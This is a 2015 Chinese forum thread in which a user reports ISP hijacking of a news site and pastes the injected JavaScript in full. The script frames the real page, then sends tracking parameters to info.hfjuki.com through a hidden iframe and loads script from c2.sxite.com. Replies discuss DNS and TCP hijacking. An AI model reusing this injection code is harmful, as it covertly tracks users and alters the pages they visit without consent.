上网奇遇记
本帖最后由 hudba 于 2015-2-3 00:56 编辑上网易看新闻半天打不开,发现状态栏在现实访问一个奇怪的域名。心里一惊,难道电脑中毒了?赶紧查看源代码,发现后面加了一段js,真正的新闻内容给iframe了
接下来就是去搜索这个域名,得到v2ex里面也有人遇到这个问题,原来是运营商搞的鬼{:soso_e131:}
https://www.google.com/search?q=info.hfjuki.com&ie=utf-8&oe=utf-8
http://www.v2ex.com/t/142197
顺便查下ip138:
这是那段js里面的代码,好象是个半成品还没写入广告数据:
function locationSearch() {
var s = getMainJs();
if (s == null) {
location.reload();
}
return s.src.substring(s.src.indexOf(".js?") + 3, s.src.length);
}
function getParameter(name, paraStr) {
var result = "";
var str = "&" + paraStr.split("?");
var paraName = "&" + name + "=";
if (str.indexOf(paraName) != -1) {
if (str.substring(str.indexOf(name), str.length).indexOf("&") != -1) {
var TmpStr = str.substring(str.indexOf(paraName), str.length);
result = TmpStr.substr(TmpStr.indexOf(paraName), TmpStr.substring(
1, TmpStr.length).indexOf("&")
- TmpStr.indexOf(paraName) + 1);
} else {
result = str.substring(str.indexOf(paraName), str.length);
}
result = result.substring(result.indexOf("=") + 1, result.length);
} else {
result = "No such parameter";
}
return (result.replace("&", ""));
}
function getMainJs() {
var scripts = document.getElementsByTagName("script");
var s = null;
for (var i = 0; i < scripts.length; i++) {
if (scripts != "undefined" && scripts.src.indexOf("t_c") != -1) {
s = scripts;
break;
}
}
return s;
}
function appendParam(oStr, aStr) {
if (oStr.indexOf('?') > 0) {
oStr = oStr + "&" + aStr;
} else {
oStr = oStr + "?" + aStr;
}
return oStr;
}
window.onerror = function() {
};
var g_titleTime = 0;
function setTcTitle() {
if (undefined == document) {
g_titleTime++;
setTimeout("setTcTitle();", 1000);
return;
}
var doc;
try {
if (document.all) {
doc = document.frames["cn"].document;
} else {
doc = document.getElementById("cn").contentDocument;
}
} catch (ex) {
}
if (g_titleTime < 5
&& (undefined == doc || undefined == doc.title || "" == doc.title)) {
g_titleTime++;
setTimeout("setTcTitle();", 1000);
return;
} else if (undefined != doc && undefined != doc.title && "" != doc.title) {
document.title = doc.title;
setTcAdvVisible();
}
}
setTimeout("setTcTitle();", 1000);
var g_isHaveVisible = false;
function setTcAdvVisible() {
if (undefined != document && undefined != document.getElementById("addiv")
&& !g_isHaveVisible) {
document.getElementById("addiv").style.visibility = 'visible';
document.getElementById("addiv").style.display = 'block';
g_isHaveVisible = true;
}
}
function UrlAnalyzer() {
this.divda = "";
this.tctype = "";
this.radius = "";
this.rlu = "";
}
UrlAnalyzer.prototype.initParameters = function() {
var paraStr = locationSearch();
this.rlu = getParameter("lruedct", paraStr);
this.divda = getParameter("divda", paraStr);
this.radius = getParameter("radius", paraStr);
this.tctype = getParameter("tctype", paraStr);
this.address = getParameter("address", paraStr);
this.usagent = getParameter("usagent", paraStr);
}
UrlAnalyzer.prototype.getHtmlDoc = function() {
var doc;
try {
if (document.all) {
doc = document.frames["cn"].document;
} else {
doc = document.getElementById("cn").contentDocument;
// doc = document.getElementById("cn").contentWindow.document;
}
} catch (ex) {
}
return doc;
}
UrlAnalyzer.prototype.setDomain = function() {
if (undefined != document.title && "" == document.title)
{
var index = document.domain.indexOf(".");
if (undefined != index && -1 != index) {
document.domain = document.domain.substring(index + 1,
document.domain.length);
}
var doc = this.getHtmlDoc();
if (undefined != doc && undefined != doc.title && "" != doc.title) {
document.title = doc.title;
setTcAdvVisible();
}
}
}
UrlAnalyzer.prototype.iframeCallback = function() {
var doc = this.getHtmlDoc();
if (undefined == doc || undefined == doc.title || "" == doc.title) {
if (undefined != document.domain) {
var self = this;
setTimeout(function(){self.setDomain.call(self, null)}, 1000);
// var index = document.domain.indexOf(".");
// if (undefined != index && -1 != index) {
// document.domain = document.domain.substring(index + 1,
// document.domain.length);
// }
//
// var doc = this.getHtmlDoc();
// if (undefined != doc && undefined != doc.title && "" !=
// doc.title) {
// document.title = doc.title;
// setTcAdvVisible();
// }
}
} else if (undefined != doc && undefined != doc.title && "" != doc.title) {
document.title = doc.title;
setTcAdvVisible();
}
}
UrlAnalyzer.prototype.executeHtmlContext = function() {
var staUrl = "http://info.hfjuki.com:8060/page/statistics?advId=" + this.divda
+ "&rd=" + this.radius + "&tctype=" + this.divda+ "&address=" + this.address+ "&usagent=" + this.usagent;
var htmlStr = "<iframe src=\"" + staUrl
+ "\" style=\"display:none\"></iframe>";
var advUrl = htmlStr
+ "<script src=\"http://c2.sxite.com:8060/center?advId="
+ this.divda + "&radius=" + this.radius+ "&area=1" + "\"><\/script>";
document.write(advUrl);
var self = this;
var iframe = document.getElementById("cn");
if (iframe.attachEvent) {
iframe.attachEvent("onload", function() {
self.iframeCallback.call(self, null);
});
} else {
iframe.onload = function() {
self.iframeCallback.call(self, null);
}
}
}
UrlAnalyzer.prototype.executeMain = function() {
var mainFrame = document.getElementById("cn");
mainFrame.contentWindow.location.href = mainFrame.src;
this.initParameters();
this.executeHtmlContext();
}
var g_analyzer = new UrlAnalyzer();
g_analyzer.executeMain();
Welcome to China 我在想有没有大牛会去干电信那个网页,那就发啦。哈哈 所以从不使用运行商的dns,http://dudns.baidu.com/ http://www.114dns.com/ 这两个都不错 法制不健全,没法。我这里也有电信绑架的问题,但你没辙,要国外,早赔的只剩内裤了。 电信DNS劫持不是一天两天了。国家垄断企业,没人能管”。。。 我这段时间也遇到了,投诉了两次,这几天没出现了,再出现继续投诉:lol 阿百川 发表于 2015-2-3 09:49
所以从不使用运行商的dns,http://dudns.baidu.com/ http://www.114dns.com/ 这两个都不错 ...
TCP劫持,换DNS也不管用的。 ads419 发表于 2015-2-3 21:26
TCP劫持,换DNS也不管用的。
幸好联通还木有这么强的技术 在国内,习惯就好
页:
[1]
